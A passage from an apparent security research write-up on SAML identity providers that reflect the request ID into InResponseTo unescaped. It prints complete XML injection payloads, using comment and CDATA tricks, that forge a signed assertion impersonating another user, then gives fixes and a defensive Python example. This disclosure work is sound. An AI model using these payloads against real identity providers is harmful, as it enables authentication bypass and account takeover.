AuthnInstant=&quot;2021-02-11T22:45:54.579Z&quot;&gt;&lt;saml:AuthnContext&gt;&lt;saml:AuthnContextClassRef&gt;urn:oasis:names:tc:SAML:2.0:ac:classes:Password&lt;/saml:AuthnContextClassRef&gt;&lt;/saml:AuthnContext&gt;&lt;/saml:AuthnStatement&gt;&lt;/saml:Assertion&gt;&lt;elem test=&quot;" Version="2.0" IssueInstant="2021-02-11T23:45:28Z" Destination="http://idp.adam.local:8080/SSOService"
AssertionConsumerServiceURL="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"><saml:Issuer>http://sp.adam.local/</saml:Issuer><samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient" AllowCreate="true"/></samlp:AuthnRequest>
When this was received by the identity provider, the following SAML response was produced. The injected XML consists of the first Issuer and Status elements, the Assertion with ID _d0a71402-b0c1-453e-93bf-a3a43c50398b and the elem element; the identity provider’s own Issuer, Status and Assertion (ID _68a25c00-2c08-458a-a760-40f5a55ada07) follow, and the payload is repeated inside the SubjectConfirmationData element of that assertion. Note that the XML was adjusted when the identity provider inserted the XML signature, which was placed after the first Issuer element:
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_b804b8b3-1ced-4e16-9ef3-03b82338729b" Version="2.0" IssueInstant="2021-02-11T23:45:49.796Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_b804b8b3-1ced-4e16-9ef3-03b82338729b">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>oE/7pnmcvbFYVsIPC4tao56UR/yAkpv3VL/VBXZXrXk=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>mA6oPZaOUMXxlFRQG5LzoVpmV4VB5K4iIQJ2sseqgYLXhrszbvJ85v7Qud6Fp8xKqC4nVIUZw73eHR2d4nakLKd0lPAqk7gTVC+1V1M3lpMkMCriqM5BNcR/lKpln3SnEzgUPAtbOgmsvKSmhME7fXIY9BUW0Kv/8FcCEdUGg70=</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<elem test=""/>
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_68a25c00-2c08-458a-a760-40f5a55ada07" Version="2.0" IssueInstant="2021-02-11T23:45:49.796Z">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2021-02-11T23:50:49.796Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"/>
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<elem test=""/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T23:45:49.796Z" NotOnOrAfter="2021-02-11T23:50:49.796Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T23:45:49.796Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
It should be noted that, due to the existence of two injection points, this SAML response contains three assertions: one injected using the XML injection payload, a second produced by the identity provider (with the legitimate [email protected] NameID), and a third injected assertion embedded within the legitimate assertion (at the location of the second InResponseTo attribute). As described previously, the handling of such a SAML response will depend on the configuration of the service provider. During tests performed by NCC Group, the vulnerable identity provider was connected to a SimpleSAMLphp installation; this accepted the SAML response and used the first occurrence of the assertion to authenticate the user, meaning that the attacker was logged in to the service under the context of [email protected].
If the service provider uses the second assertion instead of the first, or if it rejects the response due to the repeated assertions, it may be possible to utilize XML comments again to effectively remove the identity provider’s assertion from the response. Two methods have been used successfully in tests performed by NCC Group. The first, if the XML parser used by the service provider is not too strict, simply leaves an unterminated comment at the end of the payload. The identity provider may ignore the lack of a closure for the comment, and generate a signature for the response using only the attacker’s assertion. An example of a payload which may achieve this has been provided below (decoded and formatted for readability):
_29b9ae8ab8554e48c8c3a33a0bb270d5759c8a85c7">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_29b9ae8ab8554e48c8c3a33a0bb270d5759c8a85c7" NotOnOrAfter="2021-02-12T06:51:42.705Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-12T06:51:42.705Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</saml:Response><!--
When the SAML response was generated by the identity provider, the content following the "<!--" string was ignored, effectively removing both the identity provider's assertion and the second assertion reflected at the second InResponseTo insertion point.
Some identity providers will reject this payload, however, because the XML is invalid with an unterminated comment. To circumvent this restriction, the following alternative payload was developed (again, decoded and formatted for readability):
_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=' -->
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" NotOnOrAfter="2021-02-12T18:48:18.749Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
<![CDATA['>
<!-- ]]>
<ncc-elem a="
This payload takes advantage of the fact that the content will be repeated twice within the SAML response produced by the identity provider. A combination of a comment and a CDATA block is used to enclose the identity provider’s assertion, and inject the new assertion. The payload can be broken down into the following components:
- First, a quote is used to escape from the first InResponseTo attribute, and a new attribute, 'ncc-injection', is created. This attribute uses single quotes for the value, so that the double quotes in the XML for the injected assertion can be preserved.
- The payload within the attribute value includes a closing comment string "-->", followed by the malicious assertion XML. This is similar to previous payloads, but stops at the SubjectConfirmationData element, as this is where the second InResponseTo attribute occurs.
- Following the assertion XML, the attribute value includes the string used to open a CDATA block.
- Then, the single quote and angle bracket close the ncc-injection attribute and the Response element.
- The "<!--" string is used to open a new comment; this comment will enclose the identity provider's assertion.
- Then a "]]>" string is included. This will eventually close the CDATA block.
- Finally, a new element is included, "ncc-elem", with an attribute; this will balance the quote character left by the InResponseTo attribute created by the identity provider. (Note: again, this element may not be required, depending on the XML parser implementation.)
When processed by a vulnerable identity provider, the following XML was produced. Note that the first injected assertion, enclosed within the "samlp:Response" "ncc-injection" attribute, is not active. The comment encloses the first part of the identity provider's assertion, which specifies the "[email protected]" username. Then, when the payload is repeated in the second InResponseTo attribute of the identity provider's assertion, the "-->" string terminates the comment and the malicious XML becomes active. The malicious XML stops at the SubjectConfirmationData element, where the CDATA block begins; this CDATA block is designed to enclose the second "<!--" comment string, to prevent the remainder of the assertion/response XML from being commented out. Finally, the "ncc-elem" element balances the quotes, and the remainder of the identity provider's assertion template closes the XML, creating a valid SAML response:
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_65a7aa51-521c-46c2-8825-a0b51f730101" Version="2.0" IssueInstant="2021-02-12T05:55:46.978Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=" --> &lt;saml:Issuer>http://idp.adam.local:8080 &lt;/saml:Issuer> &lt;samlp:Status> &lt;samlp:StatusCode Value=&quot;urn:oasis:names:tc:SAML:2.0:status:Success&quot;/> &lt;/samlp:Status> &lt;saml:Assertion ID=&quot;_d0a71402-b0c1-453e-93bf-a3a43c50398b&quot; IssueInstant=&quot;2021-02-11T22:45:54.579Z&quot; Version=&quot;2.0&quot; xmlns:saml=&quot;urn:oasis:names:tc:SAML:2.0:assertion&quot; xmlns:xs=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;> &lt;saml:Issuer>http://idp.adam.local:8080 &lt;/saml:Issuer> &lt;saml:Subject> &lt;saml:NameID Format=&quot;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress&quot;>[email protected] &lt;/saml:NameID> &lt;saml:SubjectConfirmation Method=&quot;urn:oasis:names:tc:SAML:2.0:cm:bearer&quot;> &lt;saml:SubjectConfirmationData InResponseTo=&quot;_365db265e0bc16c34ffa06ad9b382bbff77541ee55&quot; NotOnOrAfter=&quot;2021-02-12T06:51:42.705Z&quot; Recipient=&quot;http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1&quot;/>--> &lt;![CDATA["><!-- ]]><ncc-elem a=""><saml:Issuer>http://idp.adam.local:8080</saml:Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_f78b7401-f325-4083-b280-2c55b6ef02e1" Version="2.0" IssueInstant="2021-02-12T05:55:46.978Z"><saml:Issuer>http://idp.adam.local:8080</saml:Issuer><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2021-02-12T06:00:46.978Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=' -->
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_65a7aa51-521c-46c2-8825-a0b51f730101">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>20FqC5eEhH0bv6lYVD6Dh1VczuZNg0NeemP0B32GFwc=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>O0XjQRmGusm2a2ImysF1wTB2HJSnCNE6aIxKd7cF8ZI+rEyHff4+mbW1uD81hwi4tvdwDjTZZNsnW8djLbAgT8E6dV2HsisXeDRBXvIobi1qW3KUf9k4oO70G0bhVjKWzCAHUo53SGNc6UDuvkijXoxEdyg5US13raeuXsjKs9w=</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>[certificate value elided]</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" NotOnOrAfter="2021-02-12T06:51:42.705Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>--><![CDATA['><!-- ]]>
<ncc-elem a=""/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-12T05:55:46.978Z" NotOnOrAfter="2021-02-12T06:00:46.978Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-12T05:55:46.978Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
Depending on where the InResponseTo attributes are located within the XML document, it may be necessary to adjust the payload to ensure that the XML is correct and well-formed.
There are some caveats to the InResponseTo attacks, however. This particular injection was only successful because the assertion in the SAML response was not signed. Some identity providers sign both the assertion and the SAML response. In this situation, it may only be possible to utilize the second InResponseTo injection point, as any modifications to this assertion after the application of the signature could cause the verification to fail. The specifics of this approach will vary based on the implementation of the identity provider, and the libraries used to parse and sign the XML.
Recommendations
Organizations and services that rely on SAML for authentication should examine identity providers and determine whether they are affected by XML injection vulnerabilities, particularly if the identity provider uses string-based templates to build SAML responses/assertions with user-controlled data. Ideally, SAML responses and assertions should be constructed using an appropriate XML library that can safely set user-controlled data in attributes and text nodes.
If it is absolutely necessary to use a string template, or string functions, to include user-controlled data within SAML messages, the data should be strictly validated. If XML characters are detected in the user input, the authentication attempt should be rejected with an error message. Before insertion into the document, XML encoding should be applied to the data, to ensure that even if the validation is bypassed, the user input cannot inject additional XML.
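The two recommendations above (build the response with an XML library, and strictly validate the AuthnRequest ID before it is reflected into InResponseTo), plus the service-provider-side check suggested by the earlier observation that SimpleSAMLphp simply used the first of several assertions, as an added Python example. This is not NCC Group's code; the function names, the minimal unsigned Response layout and the placeholder IDs are assumptions.

```python
# Added example (not NCC Group's code): the AuthnRequest ID is validated as an
# xs:ID and every user-controlled value is set through ElementTree, which
# escapes quotes and angle brackets, so a value cannot open a new element.
import re
import xml.etree.ElementTree as ET

SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
ET.register_namespace("samlp", SAMLP)
ET.register_namespace("saml", SAML)

# Conservative ASCII subset of an NCName (what xs:ID requires): a leading
# letter or underscore, then letters, digits, '.', '-' or '_'.  Quotes and
# angle brackets never qualify, so an ID carrying XML is rejected up front.
ID_RE = re.compile(r"[A-Za-z_][A-Za-z0-9._-]*")


def validate_request_id(value: str) -> str:
    """Reject an AuthnRequest ID that is not a syntactically valid xs:ID."""
    if not ID_RE.fullmatch(value):
        raise ValueError("AuthnRequest ID is not a valid xs:ID")
    return value


def build_response(in_response_to: str, name_id: str, recipient: str) -> bytes:
    """Serialize a minimal unsigned Response (hypothetical layout).  IDs are
    constructed placeholders; a real IdP generates fresh random ones."""
    resp = ET.Element(f"{{{SAMLP}}}Response", {
        "ID": "_constructed-response-id",
        "Version": "2.0",
        "InResponseTo": in_response_to,
    })
    assertion = ET.SubElement(resp, f"{{{SAML}}}Assertion",
                              {"ID": "_constructed-assertion-id", "Version": "2.0"})
    subject = ET.SubElement(assertion, f"{{{SAML}}}Subject")
    ET.SubElement(subject, f"{{{SAML}}}NameID").text = name_id
    confirmation = ET.SubElement(subject, f"{{{SAML}}}SubjectConfirmation",
                                 {"Method": "urn:oasis:names:tc:SAML:2.0:cm:bearer"})
    # Second reflection of the same value: still escaped, still one attribute.
    ET.SubElement(confirmation, f"{{{SAML}}}SubjectConfirmationData",
                  {"InResponseTo": in_response_to, "Recipient": recipient})
    return ET.tostring(resp)


def inspect_response(xml_bytes: bytes):
    """Service-provider side: parse the Response back and return how many
    Assertion elements it holds and the InResponseTo value it carries.
    A count other than 1 is grounds for rejecting the Response outright."""
    root = ET.fromstring(xml_bytes)
    return len(root.findall(f".//{{{SAML}}}Assertion")), root.get("InResponseTo")


if __name__ == "__main__":
    # Constructed input shaped like the page's payloads: a quote to break out
    # of the attribute, then markup.  Validation rejects it, and even without
    # validation the library keeps it inert inside the attribute value.
    hostile = '_abc"><saml:Assertion ID="_injected"/>'
    print(inspect_response(build_response(hostile, "user@example.invalid",
                                          "http://sp.adam.local/acs")))
```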
Additionally, consider enforcing the use of signatures for SAML authentication requests sent from service providers, where possible. If the SAML request signature is validated by the identity provider, any attempt to modify the request to include an XML injection payload (such as those which exploit the InResponseTo attribute) can be detected.